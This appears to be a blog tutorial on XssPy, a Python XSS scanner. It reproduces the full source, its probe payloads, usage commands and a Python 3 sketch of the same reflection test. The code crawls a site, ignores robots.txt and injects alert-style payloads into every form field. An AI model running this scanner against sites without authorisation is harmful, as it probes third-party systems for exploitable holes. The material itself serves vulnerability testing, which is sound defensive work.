Web Application Scanning with XssPy

One telling fact: Microsoft, Stanford, Motorola, Informatica, and many other large organizations use this Python-based XSS (cross-site scripting) vulnerability scanner. Written by the talented Faizan Ahmad, XssPy is a smart tool: instead of checking only the homepage or a single given page, it checks every link on the site as well as its subdomains, so its scans are both thorough and broad.

Usage

The introduction made it sound so good that I went and grabbed it to take a look:
git://www.github.com/faizann24/XssPy.git

Clone the code locally with git:
git clone http://www.github.com/faizann24/XssPy

Kali Linux already ships with it.
The tool runs on Python 2.7 and requires mechanize. If mechanize is not installed, type "pip install mechanize" in a terminal.

Usage:
python XssPy.py -u website.com -e
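
The tool's own help banner (reproduced in the listing below) documents the remaining flags; for example:

python XssPy.py -u website.com -v            # verbose logging
python XssPy.py -u website.com -c name=val   # send cookies with each request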

Python code

#!/usr/bin/env python
import mechanize
import sys
import httplib
import argparse
import logging
from urlparse import urlparse

br = mechanize.Browser()  # initiating the browser
br.addheaders = [
    ('User-agent',
     'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11')
]
br.set_handle_robots(False)
br.set_handle_refresh(False)

payloads = ['<svg "ons>', '" onfocus="alert(1);', 'javascript:alert(1)']
blacklist = ['.png', '.jpg', '.jpeg', '.mp3', '.mp4', '.avi', '.gif', '.svg',
             '.pdf']
xssLinks = []  # TOTAL CROSS SITE SCRIPTING FINDINGS


class color:
    BLUE = '\033[94m'
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BOLD = '\033[1m'
    END = '\033[0m'

    @staticmethod
    def log(lvl, col, msg):
        logger.log(lvl, col + msg + color.END)


print color.BOLD + color.RED + """
XssPy - Finding XSS made easier
Author: Faizan Ahmad (Fsecurify)
Usage: XssPy.py website.com (Not www.website.com OR http://www.website.com)
Comprehensive Scan: python XssPy.py -u website.com -e
Verbose logging: python XssPy.py -u website.com -v
Cookies: python XssPy.py -u website.com -c name=val name=val

Description: XssPy is a python tool for finding Cross Site Scripting
vulnerabilities in websites. This tool is the first of its kind.
Instead of just checking one page as most of the tools do, this tool
traverses the website and find all the links and subdomains first.
After that, it starts scanning each and every input on each and every
page that it found while its traversal. It uses small yet effective
payloads to search for XSS vulnerabilities. XSS in many high
profile websites and educational institutes has been found
by using this very tool.
""" + color.END

logger = logging.getLogger(__name__)
lh = logging.StreamHandler()  # Handler for the logger
logger.addHandler(lh)
formatter = logging.Formatter('[%(asctime)s] %(message)s', datefmt='%H:%M:%S')
lh.setFormatter(formatter)

parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url',
                    help='The URL to analyze')
parser.add_argument('-e', action='store_true', dest='compOn',
                    help='Enable comprehensive scan')
parser.add_argument('-v', action='store_true', dest='verbose',
                    help='Enable verbose logging')
parser.add_argument('-c', action='store', dest='cookies',
                    help='Space separated list of cookies',
                    nargs='+', default=[])
results = parser.parse_args()

logger.setLevel(logging.DEBUG if results.verbose else logging.INFO)


def testPayload(payload, p, link):
    br.form[str(p.name)] = payload
    br.submit()
    # if payload is found in response, we have XSS
    if payload in br.response().read():
        color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!')
        report = 'Link: %s, Payload: %s, Element: %s' % (str(link),
                                                         payload, str(p.name))
        color.log(logging.INFO, color.BOLD + color.GREEN, report)
        xssLinks.append(report)
    br.back()


def initializeAndFind():

    if not results.url:  # if the url has been passed or not
        color.log(logging.INFO, color.GREEN, 'Url not provided correctly')
        return []

    firstDomains = []  # list of domains
    allURLS = []
    allURLS.append(results.url)  # just one url at the moment
    largeNumberOfUrls = []  # in case one wants to do comprehensive search

    # doing a short traversal if no command line argument is being passed
    color.log(logging.INFO, color.GREEN, 'Doing a short traversal.')
    for url in allURLS:
        smallurl = str(url)
        # Test HTTPS/HTTP compatibility. Prefers HTTPS but defaults to
        # HTTP if any errors are encountered
        try:
            test = httplib.HTTPSConnection(smallurl)
            test.request("GET", "/")
            response = test.getresponse()
            if (response.status == 200) | (response.status == 302):
                url = "https://www." + str(url)
            elif response.status == 301:
                loc = urlparse(response.getheader('Location'))
                url = loc.scheme + '://' + loc.netloc
            else:
                url = "http://www." + str(url)
        except:
            url = "http://www." + str(url)
        try:
            br.open(url)
            for cookie in results.cookies:
                color.log(logging.INFO, color.BLUE,
                          'Adding cookie: %s' % cookie)
                br.set_cookie(cookie)
            br.open(url)
            color.log(logging.INFO, color.GREEN,
                      'Finding all the links of the website ' + str(url))
            for link in br.links():  # finding the links of the website
                if smallurl in str(link.absolute_url):
                    firstDomains.append(str(link.absolute_url))
            firstDomains = list(set(firstDomains))
        except:
            pass
    color.log(logging.INFO, color.GREEN,
              'Number of links to test are: ' + str(len(firstDomains)))
    if results.compOn:
        color.log(logging.INFO, color.GREEN,
                  'Doing a comprehensive traversal. This may take a while')
        for link in firstDomains:
            try:
                br.open(link)
                # going deeper into each link and finding its links
                for newlink in br.links():
                    if smallurl in str(newlink.absolute_url):
                        largeNumberOfUrls.append(newlink.absolute_url)
            except:
                pass
        firstDomains = list(set(firstDomains + largeNumberOfUrls))
        color.log(logging.INFO, color.GREEN,
                  'Total Number of links to test have become: ' +
                  str(len(firstDomains)))  # all links have been found
    return firstDomains


def findxss(firstDomains):
    # starting finding XSS
    color.log(logging.INFO, color.GREEN, 'Started finding XSS')
    if firstDomains:  # if there is atleast one link
        for link in firstDomains:
            blacklisted = False
            y = str(link)
            color.log(logging.DEBUG, color.YELLOW, str(link))
            for ext in blacklist:
                if ext in y:
                    color.log(logging.DEBUG, color.RED,
                              '\tNot a good url to test')
                    blacklisted = True
                    break
            if not blacklisted:
                try:
                    br.open(str(link))  # open the link
                    if br.forms():  # if a form exists, submit it
                        params = list(br.forms())[0]  # our form
                        br.select_form(nr=0)  # submit the first form
                        for p in params.controls:
                            par = str(p)
                            # submit only those forms which require text
                            if 'TextControl' in par:
                                color.log(logging.DEBUG, color.YELLOW,
                                          '\tParam: ' + str(p.name))
                                for item in payloads:
                                    testPayload(item, p, link)
                except:
                    pass
        color.log(logging.DEBUG, color.GREEN + color.BOLD,
                  'The following links are vulnerable: ')
        for link in xssLinks:  # print all xss findings
            color.log(logging.DEBUG, color.GREEN, '\t' + link)
    else:
        color.log(logging.INFO, color.RED + color.BOLD,
                  '\tNo link found, exiting')


# calling the function
firstDomains = initializeAndFind()
findxss(firstDomains)

How it works

Having read the code, the implementation principle is clear:

1. Take the URL provided and normalize it to http[s]://www. + URL, probing HTTPS first and falling back to HTTP on any error.

2. Crawl the pages it finds and check each one for a form. If a form exists, test every text input with the three built-in payloads, ['<svg "ons>', '" onfocus="alert(1);', 'javascript:alert(1)'], and flag the page when a payload is reflected in the response. A minimal sketch of this flow follows.
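
To make step 2 concrete, here is a minimal, self-contained sketch of the same reflection test in Python 3, using only the standard library. It is not XssPy's actual code: XssPy drives mechanize to fill in and submit each form, whereas this sketch simply resends each payload as a GET parameter; the target example.com and the naive regex used to discover input names are placeholders for illustration.

# Sketch of XssPy's core idea: 1) normalize the scheme, 2) fetch a page,
# 3) inject payloads into discovered inputs, 4) report reflected payloads.
import re
import urllib.parse
import urllib.request

PAYLOADS = ['<svg "ons>', '" onfocus="alert(1);', 'javascript:alert(1)']

def normalize(domain):
    # Prefer HTTPS; fall back to HTTP if the HTTPS probe fails.
    for scheme in ('https', 'http'):
        url = '%s://www.%s/' % (scheme, domain)
        try:
            urllib.request.urlopen(url, timeout=5)
            return url
        except Exception:
            continue
    return None

def reflected_payloads(url):
    # Fetch the page and collect the names of its input fields
    # (a crude regex stand-in for mechanize's form parsing).
    html = urllib.request.urlopen(url, timeout=5).read().decode('utf-8', 'replace')
    inputs = re.findall(r'<input[^>]*name=["\']([^"\']+)["\']', html, re.I)
    findings = []
    for name in inputs:
        for payload in PAYLOADS:
            # Resend the payload as a GET parameter and check whether
            # it comes back verbatim in the response body.
            probe = url + '?' + urllib.parse.urlencode({name: payload})
            try:
                body = urllib.request.urlopen(probe, timeout=5).read().decode('utf-8', 'replace')
            except Exception:
                continue
            if payload in body:
                findings.append((url, name, payload))
    return findings

if __name__ == '__main__':
    base = normalize('example.com')  # placeholder target
    if base:
        for link, param, payload in reflected_payloads(base):
            print('Possible XSS: %s param=%s payload=%s' % (link, param, payload))

If a payload string comes back verbatim in the response body, that input is a likely reflected-XSS candidate, which is exactly the check testPayload() performs with `if payload in br.response().read()`.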
